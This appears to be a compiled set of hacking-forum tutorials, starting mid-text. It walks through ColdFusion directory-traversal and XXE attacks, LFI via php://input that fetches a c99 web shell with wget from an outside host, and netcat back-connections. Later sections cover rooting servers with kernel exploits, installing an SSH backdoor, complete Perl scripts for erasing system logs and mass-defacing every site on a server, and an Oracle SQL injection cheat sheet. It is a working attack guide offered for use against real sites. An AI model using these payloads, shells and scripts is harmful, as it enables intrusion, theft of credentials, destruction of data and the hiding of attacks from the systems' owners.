referenced under: CVE-2010-2861). The LFI vulnerability allows us to read
files off of the target system, without any authentication. The neat thing that
makes this one different than most LFD is that if we play our cards right we
can use this vulnerability as a foothold to further penetrate our target, read
and see. We first try to find the admin page, as it is the most commonly
vulnerable page, but certainly not the only one. You can typically find it at
one of the following locations:

/CFIDE/administrator/index.cfm
/CFIDE/administrator/enter.cfm
/CFIDE/componentutils/index.cfm
/CFIDE/componentutils/login.cfmYou can determine the version of the CF
Server by simply viewing the login page in most cases as the image usually
contains the version graphically, like so:

Knowing the version is important as it helps us to determine the appropriate
path to use to try and turn this LFD into something useful. Now if you know
the full path to the CF '.properties' file then you're in business as it contains
the CF admin password hashes. The list of possible paths worth trying are as
follows:

v6: locale=..\..\..\..\..\..\..\..\CFusionMX\lib\password.propertiesen
v7a: locale=..\..\..\..\..\..\..\..\CFusionMX7\lib\password.propertiesen
v7b: locale=..\..\..\..\..\..\..\..\opt\coldfusionmx7\lib\password.propertiesen
v8: locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.propertiesen
vJRun: locale=..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-
ear\cfusion-war\WEB-INF\cfusion\lib\password.propertiesenIf you have a
successful injection for one of the above files, you will see the password
hash(es) show up on the page you're injecting into. It will look a bit like this:

NOTE: In version 6 & 7 encryption is not enabled by default, although i
never seen a server which did not encrypt the password in hash form.

Now you can crack the password hash and login with clear text pass or we
can use a little trick to bypass authentication requirements by using a pass-
the-hash technique. The login form uses a bit of JavaScript magic to actually
create a HMAC hash from the admin password hash and a salt value which is
changed every 30 seconds. You can find this salt value by simply viewing the
source code for login page, look at second occurrence of the term 'salt' or
review form input details. Due to this, we pass the hash and generate the
HMAC hash on our own and submit - simulating a successful login! You need
to grab the salt from source:

OK, so you now have Password hash and salt in hand....

Here is some code I whipped up to accomplish this task of logging in real
quick for you to get the authenticated cookie.

Quickly enter the needed details and run it. If successful, you will have the
authenticated cookie presented to you in terminal, like so:

Now once you have the authenticated cookie, you're pretty much in. You can
use your favorite cookie editor to load up the new
'CFAUTHORIZATION_cfadmin=<SOMEVALUEHEREONSUCCESS>'. Once
loaded you simply refresh your browser and your now logged into the
administrative panel for Cold Fusion. Now to try and get a shell up on the
server....

If you already know the server path to web facing directory then you can
move forward, if not you can check the 'Mappings' link on the left under
'Server Settings'. This will show a mapping of all paths for CF, by default the
/CFIDE dir should be mapped giving us a usable path in the majority of
cases. Mappings page looks like this:

Once path is known we will move to the 'Schedule Tasks' page located under
'Debugging & Logging' on left menu links.

Now you simply point the task scheduler at your remote CFM/JSP shell
hosted on a server you control, stored in txt format like an RFI attack
payload. You can schedule for a onetime event, it will default to current time
so no need to calculate things if your on different time zone :) If you need a
username/password to access the remote shell file source then provide as
needed in appropriate fields of task scheduler. The next is key, mark the
option to 'Publish" to true so it saves the results to a file (i.e. grab our
remote shell source, and save to executable). You then provide it with the
full path to where you want to write to. In the majority of cases /CFIDE is
writable, otherwise poke around or generate errors in SQL queries on site to
get path (standard Full Path Disclosure rules still apply here). When you
form is all setup you can submit to create the scheduled task.

You will need to click on the green check-mark icon to run the scheduled
task, which actually executes it and grabs our shell. If it has problems with
remote file you will likely get a warning message of some kind in admin
panel, edit and retry. Upon success, you can point your browser at the path
you uploaded your shell to. In most cases Cold Fusion is running on
Windows system with full NT AUTHORITY/SYSTEM privileges whic h means
you pretty much own the local box now :)

If you find that 'cfexecute' is disabled and blocking your CFM shell from
working properly, you can simply re-enable it from the admin panel since
you already have access :)

NOTE: JSP is only supported on Enterprise versions of ColdFusion. You can
actually determine Enterprise vs Standard by requesting a non-existant .jsp
file and judging how the server responds!

You have now successfully shelled a Cold Fusion Server at this point and in
most cases have admin privileges to do what you want (create new user,
add to admin group, add/enable RDP, enjoy new RDP). In the rare *nix
instances your likely running as nobody or another non-elevated user so the
usual post exploit game plan still applies if you want to takeover the whole
server (i.e. root the box). Hope you enjoyed this first part of this series,
second part to follow shortly....

Hacking Cold Fusion Servers - Part II

Now I will go over two more additional vulnerabilities which can be
potentially leveraged to attack Cold Fusion Servers. This time we will be
looking at exploiting a weak uploader as well as another LFD/LFI
vulnerability but with small twist. If you didn't catch the first part then I
encourage you to read that thread before reading this one as it makes for
better attack flow in general this way. Assuming your all set, let's begin....

Now one thing to be aware of is that Cold Fusion packed an FCKEditor in
with v8 when it was first released and they didn't due proper checking on
the upload types. If you give it a file as .txt but write to .cfm or .jsp it thinks
this is ok! This exploit will take some coding abilities on your behalf or the
ability to use Metasploit as it has a nice pre-built exploit for this one (Java
Meterpreter works best for payload). You basically shoot and point with MSF
and hope for the best. If the uploader is present it will try to send a multi-
part upload request via POST. If successful you should be able to find a shell
in '/userfiles/file/' directory of the site. Now I have coded my own script for
this and tried with Metasploit but have not successfully exploited this myself
so not going to post my code just yet, would like to confirm it first. You have
MSF as a crutch for now, can find the module by referencing CVE-2009-
2265, or just type 'use exploit/windows/http/coldfusion_fckeditor'; I will
update this section when I have confirmation of working code on my part.....

OK, so in addition to the previously shown LFD/LFI to RCE vulneranility we
demonstrated in part I of this series, there is another LFD/LFI vulnerability.
This time it is XML External Entities (XEE) Injection in the Data Services
which allows a wide range of XML based attacks, including Local File
Disclosure, TCP scans and Denial of Service condition, which can be achieved
by recursive entity injection, attribute blow up and other types of injection.
For more information about the implications associated to this vulnerability,
refer to the RFC2518 (17.7 Implications of XML External Entities):
http://www.ietf.org/rfc/rfc2518.txt. I will show you how we can exploit this
to map out the target server and read files. Basically we send a carefully
crafted XML request to the Data Service file handler and if it is vulnerable to
XEE Injection it will spit back the results we ask for. Here are some common
files to check:

/flex2gateway/
/flex2gateway/http
/flex2gateway/httpsecure
/flex2gateway/cfamfpolling
/flex2gateway/amf
/flex2gateway/amfpolling
/messagebroker/http
/messagebroker/httpsecure
/blazeds/messagebroker/http
/blazeds/messagebroker/httpsecure
/samples/messagebroker/http
/samples/messagebroker/httpsecure
/lcds/messagebroker/http
/lcds/messagebroker/httpsecure
/lcds-samples/messagebroker/http
/lcds-samples/messagebroker/httpsecure

You can accomplish this with Hackbar add-on in Firefox easily enough, Burp
or Netcat is just as easy. Essentially we can use the below XML Code as a
framework for our file injection and enumeration, simply pass it as POST
data to the vulnerable Data Service:

"<?xml version="1.0" encoding="utf-8"?><!DOCTYPE test [ <!ENTITY
x3SYSTEM "<INSERT_PATH/FILE_HERE>"> ]><amfx ver="3"
xmlns="http://www.macromedia.com/2005/amfx"><body><object
type="flex.messaging.messages.CommandMessage"><traits><string>body
</string><string>clientId</string><string>correlationId</string><string>
destination</string><string>headers</string><string>messageId</string>
<string>operation</string><string>timestamp</string><string>timeToLiv
e</string></traits><object><traits /></object><null /><string /><string
/><object><traits><string>DSId</string><string>DSMessagingVersion</s
tring></traits><string>nil</string><int>1</int></object><string>&x3;</
string><int>5</int><int>0</int><int>0</int></object></body></amfx>
"

Simply replace '<INSERT_PATH/FILE_HERE>' with the path to read an let
the requests rip, like so:

Now the cool thing here is that it works regardless of OS, since it is due to
how the Data Services are handling and parsing the XML data being passed,
just make sure you request the proper file type for designated system type
(check server response if you have no idea)...

Also in addition to reading files, you can simply pass a directory and it will
spit back the directory content, making it very easy to map things out and
find files worth reading. Now limited privileges may restrict some file reading
but still plenty enough to cause trouble, enumerate lots of info, and possibly
even read the site configuration details...

In addition to these named exploits in this Cold Fusion series, the same old
usual suspects are still fair game here. SQL injection vulnerabilities just as
common as on PHP or ASP based sites, and 'cfincludes' can enable source
disclosures. In many cases the db can be compromised and Java commands
maybe leveraged to further extend the potential attack vectors and
escalation platform from that of a standard injection so keep your eyes out
and don’t be afraid to take on a new site just cause it has .CFM or .JSP files
instead of the oh so popular .PHP or .ASP. Hope you enjoyed this short
series on hacking Cold Fusion Servers. All material for the series was
available on the net in various places, all I did was wrap it up for you and try
to make it a little easier to understand. If you have any questions or
suggestions please post em here or let me know via PM.

LFI exploitation via php://input [Shelling Sites]

Hey guys,
Today I'll be explaining how to shell a website using "php://input" method via LFI.

So let's get started.
Now let's have our target shall we. As an example, your target URL should look like this:
Code:
http://www.site.com/index.php?page=
You can have anything similar to that as long as you can be able to read files and obtain an "include"
error.

First things first, give it a shot and see if you can read "/etc/passwd"

URL will look like:
Code:
http://www.site.com/index.php?page=/etc/passwd
If successful, you'll be having a page that looks like this:

Click this bar to view the original image of 667x422px.

Now lets try reading:

Code:
/proc/self/environ
/proc/self/fd
So URL will become:
Code:
http://www.site.com/index.php?page=/proc/self/environ
http://www.site.com/index.php?page=/proc/self/fd
Hmm, seems like nothing is being displayed, even though I've added a null-byte at the end of the URL.

Click this bar to view the original image of 651x389px.

Well, not to worry, it's time to use our back up method. The "php://input" method will help us read files
with certain commands, hence enables us to upload a shell.
This can be done using the "Hackbar" or by using "Live HTTP headers"

I'll show you how to exploit via php://input using the "Hackbar"

So lets check what we're supposed to use in the Hackbar

Click this bar to view the original image of 686x190px.

Now let's try putting this method in action.
Look at the picture carefully.

Click this bar to view the original image of 800x325px.

URL will be:
Code:
http://www.site.com/index.php?page=php://input
and POST DATA:
Code:
<? system('uname -a'); ?>
Other commands
List directories
Code:
<? system('ls'); ?>
Identification
Code:
<? system('id'); ?>
Convert format

Code:
<? system('mv file.txt file.php'); ?>
Alright, let's spawn a shell there now shall we.

Grab a shell from sh3ll.org or anywhere else.
For now, we'll be using the normal c99 shell
Code:
http://www.sh3ll.org/c99.txt?

Let's use the "wget" command to spawn our shell on the site.

So our POST DATA will be:
Code:
<? system('wget http://www.sh3ll.org/c 99.txt -O nameofshell.php');?>
This is how it's gonna look like.

Click this bar to view the original image of 680x173px.

Now that you've spawn a shell, you can now navigate to your shell on the site.
Code:
http://www.site.com/shell.php
You can watch a video tutorial below so that it'll be easier to understand.
Have fun.

Server Rooting Via Shell and Mass defacement script
Now let's kill the root:

Getting Backconnection to the server
Copy the Netcat directory to C:\
Open command prompt, type: cd C:\NETCAT
It'll look like this:

Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\kislay>cd c:\netcat
c:\netcat>

Now Type: nc -l -v -p 2121
It'll look like-

c:\netcat>nc -l -v -p 2121
listening on [any] 2121 ...

Open your Shell in your browser, go to the backconnection tab, if it is not there get a
shell like "B374k" or Any other
thats your choice.

Specify your ip & port as 2121. press connect, now you'll get a shell to the server, you
can give commands to the server through that shell.

Getting a Right exploit for the server

Type : Uname -a & hit enter.

It'll look something like this:

[[email protected] /home/saijyoti/public_html/cgi-bin]$ uname -a
Linux dualxeon09.ns5.999servers.com 2.6.18-194.26.1.el5 #1 SMP Tue Nov 9 12:54:20 EST 2010
x86_64 x86_64 x86_64 GNU/Linux

It shows the kernal version of the server is: 2.6.18-194.26.1.el5
& Year is 2010.
You need to find a perfect exploit for it. you can find them at-

# Exploit-db.com
# Packetstormsecurity.org
# Th3-0utl4ws.com
# Leetupload.com

# r00tw0rm.com

Compiling & executing exploit

Now I've got an exploit, & it is written in C. So I can't execute it by just uploading.
but I need to compile it.

Before proceeding further, Cd into the tmp directory, coz it is always writable. So type:
Cd /home/XXXXX/public_html/tmp

// The path can be different, replace it with yours.
So first I'll get the exploit on the server, So I type : Wget http://exploitsite.net/exploits/my_exploit.c

// Note: There is no such site, I'm just taking it to show you.
It'll look something Like this-

[[email protected] /home/saijyoti/public_html/tmp]$ wget
http://exploitsite.net/exploits/my_exploit.c
--2011-01-25 08:21:43-- http://exploitsite.net/exploits/my_exploit.c
Resolving www.exploitsite.net... 120.139.90.84
Connecting to www.exploitsite.net|120.139.90.84|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15088 (15K) [text/x-csrc]
Saving to: `my_exploit.c'
0K .......... .... 100% 189K=0.08s
2011-01-25 08:21:44 (189 KB/s) - `my_exploit.c' saved [15088/15088]

now change the permission of the exploit to 777.

Type: Chmod 777 my_exploit.c
It may look like:

[admin@www. targetsite.com /home/targetsite/public_html/tmp]$ chmod 777 ImpelDown.c

Now the exploit is On my server, I just need to compile & execute it.
So, I'll give the command: gcc -o exploit exploit.c
It'll compile & save the exploit as exploit
It may look like-

[[email protected] /home/targetsite/public_html/tmp]$ gcc -o exploit exploit.c

Next step is to execute it So we'll type: ./exploit
It may look like:

[[email protected] /home/targetsite/public_html/tmp]$ gcc -o ImpelDown.c

Now it say got root. Let's Check is it true,
Type: id
It may look like : uid=0(saijyoti) gid=0(saijyoti) groups=0(root)
Which Means I got root :)

Installing Backdoor

type : Wget urlofbackdoor.com/sshdoor.zip
Then Type : Unzip Sshdoor.zip
Then type : ./run pass port
^ replace pass with your password, & a port.
Now connect with putty & enjoy root privileges. ;)

Methods to execute exploits written in other languages
#C exploitgcc
-o exploit exploit.c
chmod +x exploit
./exploit
#Perlperl
exploit.pl
#pythonpython
exploit.py
#phpphp
exploit.php
#zip
unzip exploit.zip
./run

Cleaning Logs
# you can use my log cleaner to clear your track :D. It is written in perl. save it as
anything.pl
& to execute type: perl anything.pl
here is the code-
[perl]

#!usr/bin/perl -w #Warnings enabled!
#Log cleaner version Public
#Give Credits Where Needed - Kouros!
#This took time, Hope you fucking use it :D
#Report bugs to [email protected]
#NOTE - YOU MUST BE ROOT!
print qq^
####################################
# Log Cleaner 3.0 PUBLIC #
# Kouros #

# #
# Virangar Security Team #
# http://www.Kouros-bl4ckhat.com #
####################################
^;
while(1) {
print "Enter Which OS: "; #User Input
chomp($os = <STDIN>); #Takes it into memory
if($os eq "help"){
print "[+]Enter Your OS! Choose from 'linux', 'aix', 'sunos', 'irix'\n";
print "[+]Hit enter with OS, Let the script do its work\n";
print "[+]Note: You MUST Be Root!\n";
print "[+]Contact Info[at]Kouros-bl4ckhat [dot] Com";
print "[+]For Bug finds... Have Fun!\n";
print "[+] - Kouros";
}
if($os eq "linux"){ #If linux typed, do the following and start brackets
foreach my $logphile(@linux) {
unlink($logphile) || print "[-]Fucked up: \"$logphile\" : $!\n";
}
} elsif($os eq "sunos"){ #If sunos typed, do the following and start brackets
foreach my $logphile(@sunos) {
unlink($logphile) || print "[-] Fucked up: \"$logphile\" : $!\n";
}
} elsif($os eq "aix"){ #If aix typed, do the following and start brackets
foreach my $logphile(@aix) {
unlink($logphile) || print "[-] Fucked up: \"$logphile\" : $!\n";
}
} elsif($os eq "irix"){ #If irix typed, do the following and start bracket
foreach my $logphile(@irix) {
unlink($logphile) || print "[-] Fucked up: \"$logphile\" : $!\n";
}
} else { print"Umm WTF !?\n"; }
#Logs of Irix Systems
{ #Start Irix Bracket
@irix = ("/var/adm/SYSLOG", "/var/adm/sulog", "/var/adm/utmp", "/var/adm/utmpx",
"/var/adm/wtmp", "/var/adm/wtmpx", "/var/adm/lastlog/",
"/usr/spool/lp/log", "/var/adm/lp/lp-errs", "/usr/lib/cron/log",
"/var/adm/loginlog", "/var/adm/pacct", "/var/adm/dtmp",
"/var/adm/acct/sum/loginlog", "var/adm/X0msgs", "/var/adm/crash/vmcore",
"/var/adm/crash/unix") #End Array
} #End Irix Bracket
#Log sof Aix Systems
{ #Start Aix Bracket
@aix = ("/var/adm/pacct", "/var/adm/wtmp", "/var/adm/dtmp", "/var/adm/qacct",
"/var/adm/sulog", "/var/adm/ras/errlog", "/var/adm/ras/bootlog",
"/var/adm/cron/log", "/etc/utmp", "/etc/security/lastlog",
"/etc/security/failedlogin", "usr/spool/mqueue/syslog") #End Array

} #End Aix Bracket
#Logs of SunOS Systems
{ #Start SunOS Bracket
@sunos = ("/var/adm/messages", "/var/adm/aculogs", "/var/adm/aculog",
"/var/adm/sulog", "/var/adm/vold.log", "/var/adm/wtmp",
"/var/adm/wtmpx", "/var/adm/utmp", "/var/adm/utmpx",
"/var/adm/log/asppp.log", "/var/log/syslog",
"/var/log/POPlog", "/var/log/authlog", "/var/adm/pacct",
"/var/lp/logs/lpsched", "/var/lp/logs/requests",
"/var/cron/logs", "/var/saf/_log", "/var/saf/port/log") #End Array
} #End Sunos bracket
#Logs of Linux Systems
{ #Start Linux Bracket
@linux = ("/var/log/lastlog", "/var/log/telnetd", "/var/run/utmp",
"/var/log/secure","/root/.ksh_history", "/root/.bash_history",
"/root/.bash_logut", "/var/log/wtmp", "/etc/wtmp",
"/var/run/utmp", "/etc/utmp", "/var/log", "/var/adm",
"/var/apache/log", "/var/apache/logs", "/usr/local/apache/logs",
"/usr/local/apache/logs", "/var/log/acct", "/var/log/xferlog",
"/var/log/messages/", "/var/log/proftpd/xferlog.legacy",
"/var/log/proftpd.xferlog", "/var/log/proftpd.access_log",
"/var/log/httpd/error_log", "/var/log/httpsd/ssl_log",
"/var/log/httpsd/ssl.access_log", "/etc/mail/access",
"/var/log/qmail", "/var/log/smtpd", "/var/log/samba",
"/var/log/samba.log.%m", "/var/lock/samba", "/root/.Xauthority",
"/var/log/poplog", "/var/log/news.all", "/var/log/spooler",
"/var/log/news", "/var/log/news/news", "/var/log/news/news.all",
"/var/log/news/news.crit", "/var/log/news/news.err",
"/var/log/news/news.notice",
"/var/log/news/suck.err", "/var/log/news/suck.notice",
"/var/spool/tmp", "/var/spool/errors", "/var/spool/logs", "/var/spool/locks",
"/usr/local/www/logs/thttpd_log", "/var/log/thttpd_log",
"/var/log/ncftpd/misclog.txt", "/var/log/nctfpd.errs",
"/var/log/auth") #End array
} #End linux bracket
} #Ends Loop
[/perl]
Mass deface
I've a perl to mass deface sites on the server. execute it as the same way as above.
[perl]
# MSRml V 0.1 #
# #
# MOROCCO.SECURITY.RULZ mass defacer and log eraser #
# #
# coded by PRI[ll #

# #
# !!!!PRIV8!!!!!PRIV8!!!!!PRIV8!!!!!PRIV8!!!! #
# #
# 05/07/2005 #
# #
# usage : perl MSRml.pl <path to index> #
# #
# example : perl MSRml.pl /tmp/index.html #
# #
# [email protected] #
#!/usr/bin/perl
use strict;
my $index = $ARGV[0];
if ($ARGV[0])
{
if( -e $index )
{
system "echo -e "33[01;34mStarted MSRml V0.1 by PRI[ll Ok !!33[01;37m"n";
system "echo -e "\033[01;37mDefacing all homepages ..."n";
system "find / -name "index*" -exec cp $index {} \;";
system "find / -name "main*" -exec cp $index {} \;";
system "find / -name "home*" -exec cp $index {} \;";
system "find / -name "default*" -exec cp $index {} \;";
system "echo -e "\033[01;37m[+] done ! all sites in this box are defaced !"n";
system "echo -e "\033[01;37m----------------------------------------------------------"n";
system "echo -e "\033[01;37mCleaning up logs ..."n";
system "echo -e "33[01;34m---------erasing default log files (too fast
=))---------33[01;37m"n";
if( -e "/var/log/lastlog" )
{
system 'rm -rf /var/log/lastlog';
system "echo -e "\033[01;37m [*]/var/log/lastlog -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/var/log/lastlog - No such file or directory\033[01;37m"n";
}
if( -e "/var/log/wtmp" )
{
system 'rm -rf /var/log/wtmp';
system "echo -e "\033[01;37m [*]/var/log/wtmp -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/var/log/wtmp - No such file or directory\033[01;37m"n";
}
if( -e "/etc/wtmp" )
{

system 'rm -rf /etc/wtmp';
system "echo -e "\033[01;37m [*]/etc/wtmp -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/etc/wtmp - No such file or directory\033[01;37m"n";
}
if( -e "/var/run/utmp" )
{
system 'rm -rf /var/run/utmp';
system "echo -e "\033[01;37m [*]/var/run/utmp -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/var/run/utmp - No such file or directory\033[01;37m"n";
}
if( -e "/etc/utmp" )
{
system 'rm -rf /etc/utmp';
system "echo -e "\033[01;37m [*]/etc/utmp -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/etc/utmp - No such file or directory\033[01;37m"n";
}
if( -e "/var/log" )
{
system 'rm -rf /var/log';
system "echo -e "\033[01;37m [*]/var/log -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/var/log - No such file or directory\033[01;37m"n";
}
if( -e "/var/logs" )
{
system 'rm -rf /var/logs';
system "echo -e "\033[01;37m [*]/var/logs -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/var/logs - No such file or directory\033[01;37m"n";
}
if( -e "/var/adm" )
{
system 'rm -rf /var/adm';
system "echo -e "\033[01;37m [*]/var/adm -erased Ok"n";
}

else
{
system "echo -e "\033[01;31m[*]/var/adm - No such file or directory\033[01;37m"n";
}
if( -e "/var/apache/log" )
{
system 'rm -rf /var/apache/log';
system "echo -e "\033[01;37m [*]/var/apache/log -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/var/apache/log - No such file or directory\033[01;37m"n";
}
if( -e "/var/apache/logs" )
{
system 'rm -rf /var/apache/logs';
system "echo -e "\033[01;37m [*]/var/apache/logs -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/var/apache/logs - No such file or directory\033[01;37m"n";
}
-10-
C:\Users\kislay\Desktop\rooted.txt 25 January 2011 20:54
if( -e "/usr/local/apache/log" )
{
system 'rm -rf /usr/local/apache/log';
system "echo -e "\033[01;37m [*]/usr/local/apache/log -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/usr/local/apache/log - No such file or
directory\033[01;37m"n";
}
if( -e "/usr/local/apache/logs" )
{
system 'rm -rf /usr/local/apache/logs';
system "echo -e "\033[01;37m [*]/usr/local/apache/logs -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/usr/local/apache/logs - No such file or
directory\033[01;37m"n";
}
if( -e "/root/.bash_history" )
{
system 'rm -rf /root/.bash_history';
system "echo -e "\033[01;37m [*]/root/.bash_history -erased Ok"n";

}
else
{
system "echo -e "\033[01;31m[*]/root/.bash_history - No such file or directory\033[01;37m"n";
}
if( -e "/root/.ksh_history" )
{
system 'rm -rf /root/.ksh_history';
system "echo -e "\033[01;37m [*]/root/.ksh_history -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/root/.ksh_history - No such file or directory\033[01;37m"n";
}
system "echo -e "\033[01;37m[+] -----done all default log and bash_history files erased !!"n";
system "echo -e "33[01;34m---------Now Erasing the rest of the machine log files (can be
long :S)---------33[01;37m"n";
system 'find / -name *.bash_history -exec rm -rf {} ;';
system "echo -e "\033[01;37m[*] all *.bash_history files -erased Ok!"n";
system 'find / -name *.bash_logout -exec rm -rf {} ;';
system "echo -e "\033[01;37m[*] all *.bash_logout files -erased Ok!"n";
system 'find / -name "log*" -exec rm -rf {} ;';
system "echo -e "\033[01;37m[*] all log* files -erased Ok!"n";
system 'find / -name *.log -exec rm -rf {} ;';
system "echo -e "\033[01;37m[*] all *.log files -erased Ok!"n";
system "echo -e "33[01;34m-------[+] !done all log files erased![+]-------33[01;37m"n";
system "echo -e "33[01;34m---------------------------------------------------33[01;37m"n";
system "echo -e "33[01;34m-----------------MSRml V 0.1----------------------33[01;37m"n";
}
else
{
system "echo -e "\033[01;31m[-] Failed ! the path to u're index could not be found
!\033[01;37m"n";
exit;
}
}
else
{
system "echo -e "\033[01;37m!!Morocco.Security.Rulz mass defacer and log eraser !!"n";
system "echo -e "\033[01;37m!!!!!!!!!!!!!!!!!!coded by PRI[ll!!!!!!!!!!!!!!!!!!!!!!!!"n";
system "echo -e
"\033[01;31m!!!!!!!!PRIV8!!!!!!!!PRIV8!!!!!!!!PRIV8!!!!!!!!PRIV8!!!!!!!!\033[01;37m"n";
system "echo -e "\033[01;37musage : perl $0 <path too u're index>"n";
system "echo -e "\033[01;37mexample : perl $0 /tmp/index.html"n";
exit;
}

Getting Shell of a website by W3af
Hello everyone, you all know about Metasploit and use it to exploit the targets. Good good...but do you
know about w3af ( Web Application Attack and Audit Framework) by Rapid7. Yes, It is also developed by
Rapid 7 which is a famous security firm and developed Metasploit. It is not bigger than metasploit, but it
is more powerful than the other web testing tools. OK now introduction is over. We proceed to the
practical.

Requisites : Python and w3af

Step 1: Open the console and type:
target
set target www.site.com

Step 2: Now type:
plugins

Step 3: Now we'll look for available plugins to enable them by typing:
help

Step 5: Now we'll chose the plugin from category "audit". Type:
audit "name of plugin" (as mentioned in the picture)

You can chose multiple plugins in one shot like: audit <plugin1> <plugin2> <plugin3>.....

Step 6: If you saw any plugin with config option marked as "YES" then to configure it type:
audit config <plugin>

Step 7: Now type:
back

Step 8: Chose another category: (if you want)
evasion or bruteforce or anyone

Step 9: Now we are ready with our values, to start the scanning type:
start scan

Step 10: After finishing the scan, we'll have to exploit the target. So type:
Exploit

Step 11: Again type:
Exploit osCommandingShell

Step 12: If everything goes right, we'll get the shell of the server, type:
interact 0 (zero)

Part - 3
 SQL Injection Cheat Sheet

 Oracle SQL Injection Cheat Sheet
 MSSQL Injection Cheat Sheet
 MySQL SQL Injection Cheat Sheet
 Postgres SQL Injection Cheat Sheet
 Ingres SQL Injection Cheat Sheet
 DB2 SQL Injection Cheat Sheet
 Informix SQL Injection Cheat Sheet

 WordPress Hacking Tricks
 DNS Zone Transfer Vulnerability Exploit
 WHMCS Hacking with Sumbit Ticket exploit
 WHMCS Auto Exploiter
 Oracle Padding Attack Using Brup Suite
 HTTP NTLM INFORMATIO N DISCLOSURE

SQL Injection Cheat Sheet
Oracle SQL Injection Cheat Sheet
Some useful syntax reminders for SQL Injection into Oracle databases…
This post is part of a series of SQL Injection Cheat Sheets. In this series, I’ve endevoured to
tabulate the data to make it easier to read and to use the same table for for each database
backend. This helps to highlight any features which are lacking for each database, and
enumeration techniques that don’t apply and also areas that I haven’t got round to researching
yet.
The complete list of SQL Injection Cheat Sheets I’m working is:
 Oracle
 MSSQL
 MySQL
 PostgreSQL
 Ingres
 DB2
 Informix
I’m not planning to write one for MS Access, but there’s a great MS Access Cheat Sheet here.
Some of the queries in the table below can only be run by an admin. These are marked with “–
priv” at the end of the query.
Version
SELECT banner FROM v$version WHERE banner LIKE ‘Oracle%’;
SELECT banner FROM v$version WHERE banner LIKE ‘TNS%’;
SELECT version FROM v$instance;
Comments
SELECT 1 FROM dual — comment
– NB: SELECT statements must have a FROM clause in Oracle so we have to use the
dummy table name ‘dual’ when we’re not actually selecting from a table.
Current User SELECT user FROM dual
List Users
SELECT username FROM all_users ORDER BY username;
SELECT name FROM sys.user$; — priv
List Password
Hashes
SELECT name, password, astatus FROM sys.user$ — priv, <= 10g. astatus tells you
if acct is locked
SELECT name,spare4 FROM sys.user$ — priv, 11g

Password Cracker checkpwd will crack the DES-based hashes from Oracle 8, 9 and 10.
List Privileges
SELECT * FROM session_privs; — current privs
SELECT * FROM dba_sys_privs WHERE grantee = ‘DBSNMP’; — priv, list a user’s
privs
SELECT grantee FROM dba_sys_privs WHERE privilege = ‘SELECT ANY DICTIONARY’;
— priv, find users with a particular priv
SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS;
List DBA Accounts
SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = ‘YES’; —
priv, list DBAs, DBA roles
Current Database
SELECT global_name FROM global_name;
SELECT name FROM v$database;
SELECT instance_name FROM v$instance;
SELECT SYS.DATABASE_NAME FROM DUAL;
List Databases
SELECT DISTINCT owner FROM all_tables; — list schemas (one per user)
– Also query TNS listener for other databases. See tnscmd (services | status).
List Columns
SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’;
SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’ and
owner = ‘foo’;
List Tables
SELECT table_name FROM all_tables;
SELECT owner, table_name FROM all_tables;
Find Tables From
Column Name
SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE
‘%PASS%’; — NB: table names are upper case
Select Nth Row
SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY
username) WHERE r=9; — gets 9th row (rows numbered from 1)
Select Nth Char SELECT substr(‘abcd’, 3, 1) FROM dual; — gets 3rd character, ‘c’
Bitwise AND
SELECT bitand(6,2) FROM dual; — returns 2
SELECT bitand(6,1) FROM dual; — returns0
ASCII Value -> Char SELECT chr(65) FROM dual; — returns A
Char -> ASCII Value SELECT ascii(‘A’) FROM dual; — returns 65

Casting
SELECT CAST(1 AS char) FROM dual;
SELECT CAST(’1′ AS int) FROM dual;
String
Concatenation
SELECT ‘A’ || ‘B’ FROM dual; — returns AB
If Statement
BEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END; —
doesn’t play well with SELECT statements
Case Statement
SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; — returns 1
SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; — returns 2
Avoiding Quotes SELECT chr(65) || chr(66) FROM dual; — returns AB
Time Delay
BEGIN DBMS_LOCK.SLEEP(5); END; — priv, can’t seem to embed this in a SELECT
SELECT UTL_INADDR.get_host_name(’10.0.0.1′) FROM dual; — if reverse looks are
slow
SELECT UTL_INADDR.get_host_address(‘blah.attacker.com’) FROM dual; — if
forward lookups are slow
SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROM dual; — if outbound TCP is
filtered / slow
– Also see Heavy Queries to create a time delay
Make DNS Requests
SELECT UTL_INADDR.get_host_address(‘google.com’) FROM dual;
SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROM dual;
Command
Execution
Javacan be used to execute commands if it’s installed.ExtProc can sometimes be
used too, though it normally failed for me.
Local File Access
UTL_FILE can sometimes be used. Check that the following is non-null:
SELECT value FROM v$parameter2 WHERE name = ‘utl_file_dir’;Java can be used
to read and write files if it’s installed (it is not available in Oracle Express).
Hostname, IP
Address
SELECT UTL_INADDR.get_host_name FROM dual;
SELECT host_name FROM v$instance;
SELECT UTL_INADDR.get_host_address FROM dual; — gets IP address
SELECT UTL_INADDR.get_host_name(’10.0.0.1′) FROM dual; — gets hostnames
Location of DB files SELECT name FROM V$DATAFILE;
Default/System SYSTEM

Databases SYSAUX
Misc Tips
In no particular order, here are some suggestions from pentestmonkey readers.
